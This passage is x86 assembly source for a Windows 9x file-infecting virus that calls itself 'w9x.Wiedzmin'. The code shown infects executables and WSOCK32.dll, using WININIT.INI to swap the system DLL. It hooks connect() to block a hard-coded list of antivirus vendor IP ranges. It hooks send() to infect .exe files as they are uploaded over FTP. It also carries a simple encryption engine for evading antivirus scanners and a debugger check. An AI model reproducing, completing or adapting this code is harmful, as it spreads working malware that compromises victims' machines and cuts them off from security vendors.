ecx,[edi+3Ch] call Align_ mov [esi+10h],eax mov [esi+08h],eax pop edx mov eax,[esi+10h] add eax,[esi+0Ch] mov [edi+50h],eax lea esi,[ebp+@uncrypt] ; ESI = Ptr to virus_start xchg edi,edx ; EDI = Raw ptr after last add edi,dword ptr [ebp+fMapReal] ;EDI = Normalized ptr mov ecx,helper mov dword ptr [ebp+czy_je],1 rep movsb push dword ptr [ebp+offset fMapReal] call dword ptr [ebp+_UnmapViewOfFile] push dword ptr [ebp+fHndMap] call dword ptr [ebp+_CloseHandle] mov ecx,dword ptr [ebp+fSize] add ecx,helper call @zostaf push dword ptr [ebp+fHnd] call dword ptr [ebp+_CloseHandle] popad ret ;************************************************************************************************ ;Wsock32 hooker!!! ;************************************************************************************************ @wsockz: mov eax,dword ptr [ebp+_GetSystemDirectoryA] mov ebx,dword ptr [ebp+_GPA] push 260 lea eax,[ebp+sysDIR] push eax call dword ptr [ebp+_GetSystemDirectoryA] lea eax,[ebp+offset winDIRr] push 260 push eax call dword ptr [ebp+_GetWindowsDirectoryA] lea edi,[ebp+sysDIR] lea esi,[ebp+wsock] call strcat lea edi,[ebp+winDIRr] lea esi,[ebp+nowe] call strcat push 1 lea eax,[ebp+winDIRr] push eax lea eax,[ebp+sysDIR] push eax call dword ptr [ebp+_CopyFileA] cmp eax,0 je bye lea edi,[ebp+finddata.cFileName] lea esi,[ebp+winDIRr] call strcat mov dword ptr [ebp+go_wsock],1 push dword ptr [ebp+hosteip] push dword ptr [ebp+imagebase] call @infect pop dword ptr [ebp+imagebase] pop dword ptr [ebp+hosteip] cmp edx,-1 je bye mov dword ptr [ebp+capis],0 mov eax,dword ptr [ebp+fMapReal] mov dword ptr [ebp+wsock_h],eax call @go_export call _God mov dword ptr [ebp+go_wsock],0 lea eax,[ebp+WININIT] push eax lea eax,[ebp+winDIRr] push eax lea eax,[ebp+sysDIR] push eax lea eax,[ebp+rename] push eax call dword ptr [ebp+_WritePrivateProfileStringA] bye: ret ;************************************************************************************************ ;STRCAT !!! Its smaller and faster (i think - but non optimized with repz) ;ENTRY: ;edi - base buffer ;esi - string to cut ;************************************************************************************************ strcat: push esi mov esi,edi sstrcat: lodsb cmp al,0 jne sstrcat dec esi mov edi,esi pop esi cat_it: lodsb cmp al,0 je le stosb jmp cat_it le:ret ;************************************************************************************************ ;Filez with 'a','A','E','e','v','V' at start - wouldn't be infected ;] ;************************************************************************************************ @bad_name: xor edi,edi lea esi,[ebp+finddata.cFileName] _letra: lodsb cmp al,'a' je error_a cmp al,'A' je error_a cmp al,'E' je error_a cmp al,'e' je error_a cmp al,'v' je error_a cmp al,'V' je error_a ret error_a: inc edi ret ;================================================================================================ ;BYTE CRYPTING ENGINE ;] SIMPLE BUT FACKING AVERZ ;================================================================================================ @GGEN_KEY: cmp dword ptr [ebp+firstk],1 jne @go__ mov ebx,40h mov dword ptr [ebp+key2],0h jmp GEN_KEY @go__: mov dword ptr [ebp+offset key],0000000h mov ebx,55h GEN_KEY: call dword ptr [ebp+_GetTickCount] idiv ebx ;w EDX reszta ;) duzo prostszy algorymt zwracania losowych cmp edx,ebx ;liczb niz ten T2000-Immortal Riota jae GEN_KEY inc edx ;MUSIMY COS SKODOWAC CHOCIAZ O +1 cmp dword ptr [ebp+firstk],1 je @go___ mov dword ptr [ebp+offset key],edx @go___: mov dword ptr [ebp+offset key2],edx ret @CRYPT_BYTEZ: mov ecx,edx Try_crypt: lodsb ;czytamy bajta qrwa :P jest w AL cmp al,0 je _zero cmp al,07h je _retprog _next: add al,cl stosb jmp Try_crypt _zero: inc edi jmp Try_crypt _retprog: ret @UN_CRYPT_BYTEZ: mov ecx,dword ptr [ebp+offset key] Try_uncrypt: lodsb cmp al,0h je _zero0 cmp al,07h je ret0 _next0: sub al,cl stosb jmp Try_uncrypt _zero0: inc edi jmp Try_uncrypt ret0: ret ;================================================================================================ ;HOOKER DATA ;================================================================================================ start_h: hooked_connect: call get_delta pushad mov edx,[esp+(10*4)] ; EDX = sockaddr mov ecx,[edx+(2*2)] ; ip shl ecx,8 ; last octet lea esi,[eax+DENIED] mov edi,eax ;save EAX in EDI scan_denied: lodsd dec esi shl eax,8 jz TOC cmp ecx,eax jne scan_denied push WSAHOST_NOT_FOUND call dword ptr [edi+_WSASetLastError] popad push -1 pop eax jmp out_c TOC: ;tHe oRgInal coNneCt ;] popad push [esp+0Ch] ;int namelen push [esp+4+8] ;const struct sockaddr FAR* name push [esp+8+4] ;SOCKET s call dword ptr [eax+a_connect] ;call orginal connect!!! out_c: retn 0Ch ;//////////////////////////////////////////////hooked send/////////////////////////////////////// hooked_send: call get_delta pushad mov edi,eax mov ebx,[esp+28h] ;20(PUSHAD)+8(FAR *buf) mov eax,[ebx] cmp eax,'ROTS' ;FTP: Storing a file ? ;) je _ftp_store TOS: popad ;tHe oRgInaL sEnd push [esp+10h] ;int flags push [esp+4+0Ch] ;int len push [esp+8+8] ;const char FAR * buf push [esp+0Ch+4] ;SOCKET s call dword ptr [eax+a_send] ;call orginal send!!! out_s: retn 10h _ftp_store: ;yeah! infect on tha fly mov edx,[esp+28h] ;point to name =] add edx,5 ;skip STOR and one space (5 bytes) mov esi,[esp+28h] @loop: lodsb cmp al,'.' ;find first dod jne @loop dec esi mov esi,[esi] ;a exe file!? cmp esi,'EXE.' je try_it cmp esi,'exe.' je try_it jmp TOS try_it: mov ecx,edi lea edi,[ecx+offset buff] mov esi,edx xor edx,edx _l: lodsb cmp al,0dh je _end stosb inc edx jmp _l mov edi,edx _end: lea edx,[ecx+offset buff] lea ebx,[ecx+offset inf_prog] push ecx ;preserve ecx push ebx push 260 call dword ptr [ecx+gcd] ;tricky ;] GetCurrentDirectory ;ftp clients use that to locate ;file. pop ecx ;load ecx mov eax,edi xor ebx,ebx lea esi,[ecx+offset inf_prog] _loop_1: lodsb inc ebx cmp al,0 jne _loop_1 _do: lea edi,[ecx+offset inf_prog] ;add \ to patch ;] add edi,ebx dec edi mov al,'\' stosb lea esi,[ecx+offset buff] _l2: ;well optimised strcat lodsb cmp al,0 je _skipp stosb jmp _l2 _skipp: lea esi,[ecx+offset santa] lea edi,[ecx+offset inf_prog2] _cat: lodsb cmp al,0 je _catt stosb jmp _cat _catt: mov al,' ' stosb lea esi,[ecx+offset inf_prog] _make_real: lodsb cmp al,0 je done stosb jmp _make_real done: mov edi,ecx push 1 lea eax,[edi+offset inf_prog2] push eax call dword ptr [edi+wex] jmp TOS reset_err: push WSAECONNRESET call dword ptr [edi+_WSASetLastError] popad push -1 pop eax jmp out_s ;/*END------------------------------------------------------------------------------------------- get_delta: call @hookerdelta @hookerdelta: pop eax sub eax,offset @hookerdelta ret my_data: a_send dd 0 a_connect dd 0 msgg dd 0BFF44146h DO_WPISU: _WSASetLastError dd 0 wex dd 0 gcd dd 0 WSAHOST_NOT_FOUND equ 11001 WSAECONNRESET equ 10054 buff db 110 dup (0) inf_prog2 db 260 dup (0) inf_prog db 260 dup (0) santa db 'C:\Program Files\deithwen.exe',0 ;santa db 'C:\WINDOWS\CALC.EXE',0 ;***********DENIED LIST************************************************************************* ;thx goez to T-2000/Immortal Riot ;] DENIED: DB 161,069,003 ; nai.com DB 216,122,008 ; avp.com DB 195,170,248 ; avp.ru, kaspersky.ru, avp2000.com, kasperskylab.ru DB 193,247,150 ; avp.ch, metro.ch DB 194,252,006 ; datafellows.com, f-secure.com DB 195,112,025 ; drsolomon.com DB 208,228,231 ; mcafee.com DB 194,203,134 ; sophos.com DB 146,145,148 ; norman.com DB 206,204,003 ; pandasoftware.com DB 193,004,210 ; complex.is DB 203,037,250 ; leprechaun.com.au DB 141,202,248 ; cai.com DB 216,033,022 ; antivirus.com, trendmicro.com DB 216,035,137 ; sarc.com DB 216,086,104 ; virus.com DB 212,029,228 ; invircible.com DB 208,226,167 ; symantec.com DB 207,227,040 ; grisoft.com DB 194,105,193 ; drweb.ru DB 000,000,000 ; end of table. hook_end label byte ;________________________________________________________________________________________________ ;============================================================================================DATA ;________________________________________________________________________________________________ ;**APIZ TO HOOK** A1 db 'send',0 A1s equ $-A1 A2 db 'connect',0 A2s equ $-A2 e_esi dd 0 APIS db 'GetProcAddress',0 APIS_SIZE = $ - APIS APIList: db "FindFirstFileA",0 db "FindNextFileA",0 db "FindClose",0 db "SetFileAttributesA",0 db "SetFileTime",0 db "CreateFileA",0 db "CreateFileMappingA",0 db "MapViewOfFile",0 db "UnmapViewOfFile",0 db "GetFileTime",0 db "GetFileSize",0 db "GetFileAttributesA",0 db "SetFileAttributesA",0 db "ReadFile",0 db "WriteFile",0 db "SetFilePointer",0 db "SetEndOfFile",0 db "CloseHandle",0 db "SetCurrentDirectoryA",0 db "GetWindowsDirectoryA",0 db "GetSystemDirectoryA",0 db "CopyFileA",0 db "ExitProcess",0 db "GetTickCount",0 db "GetCommandLineA",0 db "IsDebuggerPresent",0 db "OutputDebugStringA",0 db "WinExec",0 db "LoadLibraryA",0 db "GetModuleHandleA",0 db "Sleep",0 db "GetSystemTime",0 db "WritePrivateProfileStringA",0 db "VirtualAlloc",0 db "VirtualFree",0 db "GetCurrentDirectoryA",0,07h ;07h stops the looking up msg dd 0BFF44146h key dd 0 ;shit7 db "w.dll",0 marker db 'sru.exe',0 ;marker db '*.exe',0 TO_CRYPT_DATA: to_ja: db 0ah,0dh db "",0ah,0dh db "<w9x.Wiedzmin (c) - YuP - Welcome to new school>",0ah,0dh db "ĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽ",0ah,0dh db "Ć Deithwen Addan Flared Again",0ah,0dh db "Ć You have eyez, but u can't see",0ah,0dh db "Ć You have earz, but u can't hear",0ah,0dh db "Ć Wake up from unreal world before",0ah,0dh db "Ć you drown in the Sea of Chaos.",0ah,0dh db "",0ah,0dh db "ĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽ",0ah,0dh db 0ah,0dh,0 wsock db "\WSOCK32.dll",0 nowe db "\WZZOCK32.dll",0 sice9x db "\\.\SICE",0 sle db "WSASetLastError",0 user32 db "USER32.DLL",0 gdi32 db "GDI32.DLL",0 WININIT db "WININIT.INI",0 rename db "rename",0 jed db "X",0 famil db "Verdana",0 logo db ": w9x.WiEDZMiN has you :",0 deshit db "kfe",0,07h @crypt_my_body: push ecx call dword ptr [ebp+_GetTickCount] mov ebx,255 idiv ebx mov ecx,edx @mutualisk: mov byte ptr [edi],90h inc edi loop @mutualisk pop ecx pushad lea edx,[ebp+offset @to_this] mov eax,[ebp+key_main] mov ecx,TO_DE @loop_decryptt: xor byte ptr [edx],al inc edx loop @loop_decryptt @end_de: popad rep movsb mov edi,'!PUY' call @main_decryptor ret key_main dd 0 ;db 5 dup (90h) ; align dword VirusEnd label byte ;==================================================FIND========================================= ;=============================================VirtualData nie idzie do wira===================== HeapStart label byte finddata WIN32_FIND_DATA <> ;wskaznik do struktury fileHandle dd 0 fileAtrib dd 0 licznik_b dd 0 APIListA: _FindFirstFileA dd 0 _FindNextFileA dd 0 _FindClose dd 0 _SetAttributesA dd 0 _SetFileTime dd 0 _CreateFileA dd 0 _CreateFileMappingA dd 0 _MapViewOfFile dd 0 _UnmapViewOfFile dd 0 _GetFileTime dd 0 _GetFileSize dd 0 _GetFileAttributesA dd 0 _SetFileAttributesA dd 0 _ReadFile dd 0 _WriteFile dd 0 _SetFilePointer dd 0 _SetEndOfFile dd 0 _CloseHandle dd 0 _SetCurrentDirectoryA dd 0 _GetWindowsDirectoryA dd 0 _GetSystemDirectoryA dd 0 _CopyFileA dd 0 _ExitProcess dd 0 _GetTickCount dd 0 _GetCommandLineA dd 0 _IsDebuggerPresent dd 0 _OutputDebugStringA dd 0 _WinExec dd 0 _LoadLibraryA dd 0 _GetModuleHandleA dd 0 _Sleep dd 0 _GetSystemTime dd 0 _WritePrivateProfileStringA dd 0 _VirtualAlloc dd 0 _VirtualFree dd 0 _GetCurrentDirectoryA dd 0 @GDI_APIZA: _CreateFontA dd 0 _TextOutA dd 0 _SetBkMode dd 0 _SetTextColor dd 0 _SelectObject dd 0 _GetSystemMetrics dd 0 _GetDesktopWindow dd 0 _GetWindowDC dd 0 _ReleaseDC dd 0 SYSTEM_TIME: wYear dw 0 wMonth dw 0 wDayOfWeek dw 0 wDay dw 0 wHour dw 0 wMinute dw 0 wSecond dw 0 wMilliseconds dw 0 F1: dd 2 dup (?) F2: dd 2 dup (?) F3: dd 2 dup (?) vbuf dd 0 help_virus dd 0 memory dd 0 header dd 0 align dd 0 _hostIP dd 0 _secAlign dd 0 newEIP dd 0 NewEIP dd 0 firstk dd 0 key2 dd 0 go_wsock dd 0 wsock_h dd 0 moj_address dd 0 capis dd 0 wsock_hh dd 0 NON dd 0 ;numbers of names AOF dd 0 ;addr of Functions AON dd 0 ;addr of Names AOO dd 0 ;addr of Ordinals IndexA dd 0 _GPA dd 0 fHnd dd 0 fHndMap dd 0 fMapReal dd 0 fSize dd 0 my_seh dd 0 was_win dd 0 ic dd 0 sHnd dd 0 shitsize dd 0 oldDIR db 512 dup (?) winDIR db 260 dup (?) sysDIR db 260 dup (?) winDIRr db 260 dup (?) db 5 dup (?) toHOST dd 0 ; align dword HeapEnd label byte titlee db "w9x.Wiedzmin by YuP - 1st Generation",0 bodyy db "Elaine blath, Feainnewedd",0ah,0dh db "Dearme aen a'caelme tedd",0ah,0dh db "Eigean evelienn deireadh",0ah,0dh db "Que'n esse, va en esseath",0ah,0dh db "Feainnewedd, elaine blath!" db 0ah,0dh virussizee db " bytes",0 fakehost: push 0h push offset titlee push offset bodyy push 0h call MessageBoxA push 0h call ExitProcess endshit: ends End v_start